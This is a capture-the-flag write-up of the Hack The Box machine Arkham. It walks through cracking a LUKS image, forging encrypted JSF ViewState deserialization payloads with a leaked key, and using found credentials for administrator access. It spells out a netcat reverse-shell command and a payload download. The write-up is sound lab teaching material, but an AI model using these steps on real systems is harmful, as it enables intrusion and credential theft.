# Hack The Box - Arkham

## Quick Summary

Hey guys today Arkham retired and here’s my write-up about it. This box was a challenging one and I enjoyed it a lot, it had an interesting java deserialization vulnerability which is the best thing about this box. Despite the fact that some parts were annoying, this box was great. It’s a Windows box and its ip is 10.10.10.130, I added it to /etc/hosts as arkham.htb. Let’s jump right in !

## Nmap

As always we will start with nmap to scan for open ports and services :
nmap -sV -sT -sC arkham.htb

We have http on port 80, 8080 and smb, I checked smb first.

## SMB

Let’s use smbclient to list the shares :

Users is an interesting share name, I checked it and it had the directories for Guest and default users :

I enumerated it for some time but I couldn’t find anything useful so I checked BatShare which had a zip archive called appserver.zip :

I downloaded it (get appserver.zip) then I started to examine it.

## Decrypting the Backup Image (LUKS Encrypted Image)

After unzipping appserver.zip I got 2 files, IMPORTANT.txt and backup.img

IMPORTANT.txt was a note from Bruce to Alfred telling him that this is the backup image from their Linux server :

Backup.img was a LUKS encrypted image :

We can attempt to open it with cryptsetup but of course we will need a password :

We can use a tool called bruteforce-luks to bruteforce the password, but using it with rockyou would take a very long time. The box so far has a lot of batman references, like the names Alfred, Bruce, Joker and the share name BatShare, also the comment of that share : Master Wayne's secrets.
I took all the passwords from rockyou that had batman in them and created a custom list :

It worked and the password was batmanforever.

It had a directory called Mask so I copied it then I unmounted the image.

There were some useless stuff that I didn’t really care about, there was a directory called tomcat-stuff which had some web server configuration files, that one was interesting.

We have the server configuration files, However we haven’t checked any of the http ports yet.

HTTP Enumeration
Port 80 had nothing running, there was only the default IIS index page and no subdirectories.

On port 8080 there was a website with some links :

One of the links was the subscription link : http://arkham.htb:8080/userSubscribe.faces

I tested it to see what will happen :

Nothing interesting, I intercepted the request with burp and found some interesting parameters in the POST request :

## JSF ViewState Deserialization Vulnerability

The page had .faces extension and the POST request had a parameter called javax.faces.ViewState.
After some research I knew that this parameter holds a java serialized object, this means that there is a potential deserialization vulnerability.

Some resources if you are unfamiliar with deserialization vulnerabilities :

When I tried to decode the base-64 encoded value I got nothing readable:

I redirected the output into a file and ran file command against it, and I got data instead of Java serialization data.
This means that the serialized data are encrypted. Luckily we have the server configuration files, it’s time to check them.
In web.xml.bak I found the key used to encrypt the data, also the MAC algorithm which was hmac-sha1 and the used key.

The same key was used : SnNGOTg3Ni0=, it’s base-64 encoded so we need to decode it :

The key is JsF9876-.
We have everything we need to encrypt the data correctly, I wrote a python script to do it.
Basically I’m going to create the payload with ysoserial then use my script to encrypt it.
viewstate.py :

This script has two functions, encrypt() and hmac_sig(), encrypt() takes the payload generated by ysoserial and DES encrypts it using the key then returns the encrypted payload. hmac_sig() takes the encrypted payload and generates the hmac signature that will be appended to the encrypted payload.
The script takes two arguments, first one is for the filename that contains the ysoserial generated payload, it encrypts it then generates the hmac signature, appends it to the encrypted payload, base-64 encodes the final payload and url-encodes it. Then it saves the payload into the output file which is the second argument.
Time to use ysoserial, we run into the problem of which payload to use, I used CommonsCollections5 and it worked.
I created two payloads, first one is to download nc.exe from my box and save it in C:\windows\system32\spool\drivers\color, second one is to execute the reverse shell command : nc.exe -e cmd.exe 10.10.xx.xx 1337

Then I encrypted them with my script :

I ran a python server to host nc.exe and I started my nc listener on port 1337, then I sent the payloads.
1st Request :

Response :

I got a 500, and when I checked my python server I saw that I got a request so everything is fine.
2nd Request :

Response :

Then I checked my listener, and :

We owned user !
I also scripted this because copying and pasting in burp wasn’t my favorite thing and it only takes 2 minutes to script this in python :

## Shell as Batman

We are on the box as Alfred, I enumerated the directories and found a directory called backups in C:\Users\Alfred\Downloads, It had a zip archive called backup.zip :

I wanted to get it on my box so I used nc to do it. I listened on port 1338, then on the box I did this:

And I successfully got the file :

The archive only had a file called alfred@arkham.local.ost which is an outlook email folder so I used readpst to convert it.

The output was saved in Drafts.mbox, I removed the long useless output :

We can see two interesting things here, first one is this message : Master Wayne stop forgetting your password and second one is the base-64 encoded image. I decoded it and saved it :

image001.png :

Great, we have the password for Batman. By checking the local group memberships of Batman we can see that Batman is in the Administrators group, and also in the Remote management users group :

So we can use powershell‘s Invoke-Command with the credentials we have to get a reverse shell :

## Root Flag

Batman is in the Administrators group, however I couldn’t read the flag :

That was weird, after trying a lot of things I wanted to see If anything will change if I mounted C\$ then accessed it.

And yes that worked :

We owned root !
That’s it , Feedback is appreciated !